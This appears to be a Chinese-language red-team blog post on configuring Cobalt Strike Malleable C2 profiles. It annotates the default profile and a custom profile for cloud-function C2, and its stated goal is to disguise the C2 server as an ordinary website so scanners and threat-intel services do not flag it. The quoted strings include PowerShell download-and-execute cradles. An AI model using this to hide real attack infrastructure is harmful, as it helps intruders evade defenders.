WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

其它

关于博客

面试

杂谈

自定义CS profile配置文件

default.profile是CobaltStrike自带的配置文件

这个文件可以自定义许多信息,比如web请求地址,默认睡眠时长等,这次挑几个来说一下

0x01 CS通信机制

网上已经有很多详细的解释了,我就写个简单的解释

用过CS的师傅都知道有睡眠,如果你要执行命令则会在睡眠结束后返回命令

在没有执行任何命令的情况下,客户端会向服务端发送一个GET请求,请求里会带着客户端的基本信息,具体在哪里需要看profile的配置

执行命令后,客户端也会发送一个GET请求,告诉服务端自己要执行命令了,服务端会下发一个id和具体任务要求,客户端执行完后会将结果POST回去

这里不涉及流量加解密,以后再写文章吧

0x02 默认配置

先看自带的配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
# default sleep time is 60s
set sleeptime "60000"; //默认六十秒睡眠时间

# jitter factor 0-99% [randomize callback times]
set jitter "0"; //随机时间

# indicate that this is the default Beacon profile
set sample_name "Cobalt Strike Beacon (Default)"; //就是一个名字

# this is the default profile. Make sure we look like Cobalt Strike's Beacon payload. (that's what we are, right?)
stage { //beacon.dll会按照这里配置生成
set stomppe "false"; //关闭轻度混淆
set name "beacon.dll"; //要修改的文件名

string "%d.%s"; //添加到文件的字符串
string "post";
string "%s%s";
string "cdn.%x%x.%s";
string "www6.%x%x.%s";
string "%s.1%x.%x%x.%s";
string "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x.%x%x.%s";
string "%s.1%08x.%x%x.%s";
string "api.%x%x.%s";
string "unknown";
string "could not run command (w/ token) because of its length of %d bytes!";
string "could not spawn %s (token): %d";
string "could not spawn %s: %d";
string "Could not open process token: %d (%u)";
string "could not run %s as %s\\%s: %d";
string "COMSPEC";
string " /C ";
string "could not upload file: %d";
string "could not open %s: %d";
string "could not get file time: %d";
string "could not set file time: %d";
string "127.0.0.1";
string "Could not connect to pipe (%s): %d";
string "Could not open service control manager on %s: %d";
string "Could not create service %s on %s: %d";
string "Could not start service %s on %s: %d";
string "Started service %s on %s";
string "Could not query service %s on %s: %d";
string "Could not delete service %s on %s: %d";
string "SeDebugPrivilege";
string "SeTcbPrivilege";
string "SeCreateTokenPrivilege";
string "SeAssignPrimaryTokenPrivilege";
string "SeLockMemoryPrivilege";
string "SeIncreaseQuotaPrivilege";
string "SeUnsolicitedInputPrivilege";
string "SeMachineAccountPrivilege";
string "SeSecurityPrivilege";
string "SeTakeOwnershipPrivilege";
string "SeLoadDriverPrivilege";
string "SeSystemProfilePrivilege";
string "SeSystemtimePrivilege";
string "SeProfileSingleProcessPrivilege";
string "SeIncreaseBasePriorityPrivilege";
string "SeCreatePagefilePrivilege";
string "SeCreatePermanentPrivilege";
string "SeBackupPrivilege";
string "SeRestorePrivilege";
string "SeShutdownPrivilege";
string "SeAuditPrivilege";
string "SeSystemEnvironmentPrivilege";
string "SeChangeNotifyPrivilege";
string "SeRemoteShutdownPrivilege";
string "SeUndockPrivilege";
string "SeSyncAgentPrivilege";
string "SeEnableDelegationPrivilege";
string "SeManageVolumePrivilege";
string "Could not create service: %d";
string "Could not start service: %d";
string "Failed to impersonate token: %d";
string "Failed to get token";
string "IsWow64Process";
string "kernel32";
string "Could not open '%s'";
string "%s\\%s";
string "copy failed: %d";
string "move failed: %d";
string "D 0 %02d/%02d/%02d %02d:%02d:%02d %s";
string "F %I64d %02d/%02d/%02d %02d:%02d:%02d %s";
string "Wow64DisableWow64FsRedirection";
string "Wow64RevertWow64FsRedirection";
string "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.";
string "could not allocate %d bytes in process: %d";
string "could not write to process memory: %d";
string "could not adjust permissions in process: %d";
string "could not create remote thread in %d: %d";
string "could not open process %d: %d";
string "%d is an x64 process (can't inject x86 content)";
string "%d is an x86 process (can't inject x64 content)";
string "syswow64";
string "system32";
string "Could not set PPID to %d: %d";
string "Could not set PPID to %d";
string "ntdll";
string "NtQueueApcThread";
string "%ld ";
string "%.2X";
string "%.2X:";
string "process";
string "Could not connect to pipe: %d";
string "%d %d %s";
string "Kerberos";
string "kerberos ticket purge failed: %08x";
string "kerberos ticket use failed: %08x";
string "could not connect to pipe: %d";
string "could not connect to pipe";
string "Maximum links reached. Disconnect one";
string "%d %d %d.%d %s %s %s %d %d";
string "Could not bind to %d";
string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')";
string "%%IMPORT%%";
string "Command length (%d) too long";
string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s";
string "powershell -nop -exec bypass -EncodedCommand \"%s\"";
string "?%s=%s";
string "%s&%s=%s";
string "%s%s: %s";
string "%s&%s";
string "%s%s";
string "Could not kill %d: %d";
string "%s %d %d";
string "%s %d %d %s %s %d";
string "%s\\*";
string "sha256";
string "abcdefghijklmnop";
string "sprng";
string "could not create pipe: %d";
string "I'm already in SMB mode";
string "%s (admin)";
string "Could not open process: %d (%u)";
string "Failed to impersonate token from %d (%u)";
string "Failed to duplicate primary token for %d (%u)";
string "Failed to impersonate logged on user %d (%u)";
string "Could not create token: %d";
string "HTTP/1.1 200 OK";=

//这里是get请求,请求到下面的路径都会存在
# define indicators for an HTTP GET
http-get {
# Beacon will randomly choose from this pool of URIs
set uri "/ca /dpixel /__utm.gif /pixel.gif /g.pixel /dot.gif /updates.rss /fwlink /cm /cx /pixel /match /visit.js /load /push /ptj /j.ad /ga.js /en_US/all.js /activity /IE9CompatViewList.xml";

//这里是客户端请求服务端的格式,前面说的基础信息就会通过base64加密后请求
client {
# base64 encode session metadata and store it in the Cookie header.
metadata {
base64;
header "Cookie";
}
}
//这里是服务端的返回包,类型为application/octet-stream,如果有需要下发的任务id和任务就直接输出
server {
# server should send output with no changes
header "Content-Type" "application/octet-stream";

output {
print;
}
}
}

# define indicators for an HTTP
http-post {
# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
set uri "/submit.php"; //定义请求路径
//定义请求头
client {
header "Content-Type" "application/octet-stream";

# transmit our session identifier as /submit.php?id=[identifier]
//这里就是任务id
id {
parameter "id";
}

# post our output with no real changes
output { //直接打印结果
print;
}
}

# The server's response to our HTTP POST
server {
header "Content-Type" "text/html"; //定义返回包类型

# this will just print an empty string, meh...
output {
print; //直接打印结果
}
}
}

//下面是dnsbeacon的配置先不写了,因为还没用过dnsbeacon
# define indicators/attributes for a DNS Beacon
dns-beacon {
# maximum number of bytes to send in a DNS A record request
set maxdns "255";

set beacon "";
set get_A "cdn.";
set get_AAAA "www6.";
set get_TXT "api.";
set put_metadata "www.";
set put_output "post.";
}

像微步平台都能查看是否为恶意服务器,基本这个默认配置都会被发现,直接扫描一下http-get和http-get里面定义的路径是否存在,如果都存在就是个C2服务器,为了避免被标记修改修改配置文件

0x03 修改配置

https://github.com/rsmudge/Malleable-C2-Profiles

这项目有很多profile的实例

主要是最近看了一下云函数,使用云函数要修改profile,直接拿云函数那个profile来说吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
set sleeptime "10000";		//上线睡眠默认十秒
set jitter "0"; //不随机
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"; //设置请求头

http-get {

set uri "/index.html"; //定义路径

client {
header "Accept" "*/*"; //定义请求头
metadata {
base64; //数据用base64加密
prepend "SESSIONID=";//加密后的数据放到SESSIONID
header "Cookie";
}
}

server {
header "Content-Type" "text/html; charset=utf-8";//定义返回请求头
header "content-transfer-encoding" "binary";
header "Server" "nginx";
output {
base64; //输出结果base64编码
append "index"; //这里有个小细节,append一定要写在base64后面,不然会一起编码
print; //输出
}
}
}

//这里定义的是下载payload的位置,之前说过cs的reverse的shellcode功能是从服务器下载主要功能的shellcode,如果不定义这个就会生成一个随机四个字符串
http-stager {
set uri_x86 "/vue.min.js"; //32位shellcode存放地址
set uri_x64 "/bootstrap-2.min.js"; //64位shellcode存放地址
}

//下面重复的就不写了
http-post {
set uri "/wp-admin.php"; //post路径
client {
header "Accept" "*/*";
//这里的id就是任务id。post命令执行结果的时候就是用这里的
id {
base64;
prepend "JSESSION=";
header "Cookie"; //这样写格式最后在数据包的格式为Cookie: JSESSION=base64(id)
}
output {
base64; //post的数据为base64编码
print;
}
}
//同样是定义服务端的返回头和数据
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
print;
}
}
}

这样修改过之后有网络爬虫来也只会认为是一个正常的网站,可能只是页面有问题所以不显示,那些识别cms的工具都是通过扫专门文件来判断使用的是什么cms,写个wp-admin可能就会被认为是wp的网站

这文件有注释肯定是用不了的,后面放一个没注释过的,也省的师傅们删掉

写好的profile可以用CS自带的c2lint测试是否可用

这样使用自定义的profile

0x04 参考资料

https://shanfenglan.blog.csdn.net/article/details/107791606

https://www.chabug.org/web/832.html

https://www.cobaltstrike.com/help-malleable-c2